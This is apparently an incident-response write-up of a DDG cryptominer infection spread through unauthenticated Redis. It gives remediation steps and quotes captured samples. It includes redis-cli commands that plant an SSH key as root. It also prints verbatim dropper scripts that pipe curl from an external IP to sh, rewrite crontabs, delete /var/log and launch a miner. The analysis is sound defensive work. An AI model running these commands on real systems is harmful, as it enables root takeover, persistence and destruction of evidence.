# Reproduction of the attack chain behind this incident: an Internet-exposed
# Redis with no requirepass (and, presumably, running as root — it has to be
# able to write under /root/.ssh/) is abused to drop an SSH public key.
#
# Step 1: store the attacker's payload file "foo" under the key "crackit".
# -x reads the value from stdin. The post never shows "foo"; for this trick
# it is assumed to be an SSH public key padded with blank lines so the key
# survives the RDB framing — TODO confirm the payload contents.
redis-cli -h 12.34.56.78 -x set crackit < foo

# Step 2: redirect the RDB dump into root's SSH directory under the name
# authorized_keys. Issued non-interactively here; the original typed the same
# three commands inside an interactive redis-cli session.
# NOTE(review): Redis only writes the dump file on save/bgsave; that step is
# not shown in the post even though the ssh login below depends on it.
redis-cli -h 12.34.56.78 config set dir /root/.ssh/
redis-cli -h 12.34.56.78 config get dir
redis-cli -h 12.34.56.78 config set dbfilename "authorized_keys"
此时攻击者的公钥已被 redis 写入 /root/.ssh/authorized_keys，攻击者用对应的私钥即可免密以 root 远程登录目标服务器：
# Log in as root with the private key matching the planted public key.
ssh -l root 12.34.56.78
解决步骤（顺序很重要：先切断入口和定时任务，再清理文件，否则被删掉的文件会被定时任务重新拉回来）:
1. 关闭 redis 未授权访问: 将 redis 只绑定到 127.0.0.1 或内网地址、设置 requirepass、用防火墙封禁对外暴露的 6379 端口, 并且不要以 root 身份运行 redis（本例能写入 /root/.ssh 正是因为 redis 以 root 运行）。
2. 清理被写入的 authorized_keys: 删除 /root/.ssh/authorized_keys 中攻击者的公钥（该文件是 redis dump 直接写出的, 通常整个文件都是攻击者内容）, 并检查其他账户的 ~/.ssh/authorized_keys 是否也被写入。
3. 清除 /var/spool/cron 目录下的定时任务: 同时检查 /var/spool/cron/root 和 /var/spool/cron/crontabs/root（i.sh 两个路径都会写）, 以及 /etc/crontab、/etc/cron.d。
4. 杀死进程 qW3xT.4 和 ddgs.3016。
5. 删除 /tmp 下的执行文件 qW3xT.4 和 ddgs.3016; 若删除失败, 先用 lsattr 查看并用 chattr -i 去掉不可变属性（该家族的 disable.sh 会对文件使用 chattr +i）。
6. 在出口防火墙封禁 216.155.135.37:8000。注意 i.sh 已执行 rm -rf /var/log, 本机登录日志已被清空, 无法从本机日志追溯入侵时间; 鉴于攻击者已取得 root 权限, 建议在保留证据后重装系统, 而不是只做清理。
分析如下:
服务器 top 显示 CPU 占用异常, 存在两个异常进程: qW3xT.4 和 ddgs.3016。
定位两个进程对应的可执行文件: Linux 启动一个进程时, 系统会在 /proc 下创建一个以 PID 为名称的目录, 其中保存了该进程的详细信息; 目录下的 exe 符号链接就指向执行程序的绝对路径（例如 ls -l /proc/<PID>/exe）。本例中两个执行程序都在 /tmp 下, 也可以用 find 全盘搜索:
# Locate both dropped binaries anywhere on the filesystem (the write-up finds
# them under /tmp). One find per name, same output as running them by hand;
# for a running process `ls -l /proc/<PID>/exe` answers faster than a scan.
for dropped in qW3xT.4 ddgs.3016; do
  find / -name "$dropped"
done
执行程序位于 /tmp 下。直接清除 /tmp 下的两个执行文件后, 过一会儿它们会再次生成——这是定时任务在重新下载, 所以必须先清理定时任务再删除文件。
/var/spool/cron 目录下存在 root 用户的计划任务文件 /var/spool/cron/root（也可以用 crontab -l 查看、crontab -r 清除当前用户的全部计划任务; 注意 crontab -r 会把正常任务一并删掉, 且 i.sh 还会写 /var/spool/cron/crontabs/root, 需要一起检查）, 内容如下:
# Attacker-installed entry in root's crontab (i.sh writes the same line to
# /var/spool/cron/crontabs/root as well): every 15 minutes fetch i.sh over
# plain HTTP and pipe it straight into sh, which re-downloads the miner if
# it has been removed.
*/15 * * * * curl -fsSL http://216.155.135.37:8000/i.sh | sh
计划任务每 15 分钟拉取并执行的 i.sh 内容如下（curl ... | sh 是把远程返回的内容直接交给 shell 执行, 没有任何校验）:
# i.sh — dropper/persistence script fetched every 15 minutes by the cron
# entry above. Captured sample, kept verbatim as evidence; the comments are
# the analyst's. It (1) rewrites root's crontab so it keeps re-fetching
# itself, (2) wipes /var/cache and /var/log, (3) downloads and runs the
# ddgs.3016 miner for this CPU architecture, (4) kills competing miners.
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
# Persistence: truncate root's crontab, then add two equivalent fetch-and-pipe
# entries (curl and wget) so the absence of either tool does not break it.
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/root
# Same two entries under the Debian/Ubuntu crontab location — both files must
# be cleaned during remediation.
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
# Anti-forensics: removes the entire log tree, not just auth logs — expect no
# on-host login history or timeline for the intrusion window.
rm -rf /var/cache /var/log
# If no process with /tmp/ddgs.3016 on its command line is running, delete
# the stale binary so the block below fetches a fresh copy.
ps auxf | grep -v grep | grep /tmp/ddgs.3016 || rm -rf /tmp/ddgs.3016
if [ ! -f "/tmp/ddgs.3016" ]; then
# Fetch the payload matching `uname -m` (wget first, then curl over the same
# URL, overwriting), mark it executable and launch it. Plain HTTP, no
# integrity check.
wget -q http://216.155.135.37:8000/static/3016/ddgs.$(uname -m) -O /tmp/ddgs.3016
curl -fsSL http://216.155.135.37:8000/static/3016/ddgs.$(uname -m) -o /tmp/ddgs.3016
chmod +x /tmp/ddgs.3016 && /tmp/ddgs.3016
# NOTE(review): no closing `fi` appears in this listing; it presumably sat
# after the launch line — confirm against the original sample.
# Kill every process whose ps line contains one of these strings (the author
# treats them as rival miners/pools). The strings double as IOCs when
# triaging other hosts.
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
1. 重写 root 的定时任务（/var/spool/cron/root 与 /var/spool/cron/crontabs/root 两处）, 使自身每 15 分钟被重新下载并执行
2. `rm -rf /var/cache /var/log` 删除整个日志目录, 清空系统登录日志等取证线索
3. 按 CPU 架构（uname -m）下载主文件 `ddgs.3016` 到 /tmp 并执行
4. 杀死系统中的其他挖矿进程（Circle_MI、hashvault.pro、nanopool.org、minexmr.com 等）
访问脚本中的地址 http://216.155.135.37:8000/static/ 查看（取证时请在隔离环境中访问, 不要在受害主机上下载或执行）, 该目录下还存在 disable.sh, 内容如下:
# disable.sh — second script hosted under the same /static/ path (captured
# sample, kept verbatim). It does not mine; it locks a rival miner ("yilu")
# out of the host: creates empty, non-executable, immutable files at the
# rival's install paths so it can no longer write or execute there, then
# kills its running processes.
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
# Create the rival's directories and zero-byte placeholder files.
mkdir -p /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
# Strip execute bits, then set the immutable attribute: the files cannot be
# modified, renamed or deleted until `chattr -i` is run. Remediation must
# lsattr / chattr -i these paths before they can be cleaned up.
chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
# Terminate any running instance of the rival by its install path.
ps auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /usr/bin/bsd-port/getty | awk '{print $2}' | xargs kill
此脚本并不挖矿, 而是通过创建不可变的占位文件（chattr +i）并 kill 其进程, 阻止另一款挖矿程序 yilu 运行; yilu 的地址为 https://www.yiluzhuanqian.com/（同样请勿在生产主机上访问）。
吾爱破解上对本家族前一版本（3014）的样本分析可参考:《DDG最新变种3014样本分析》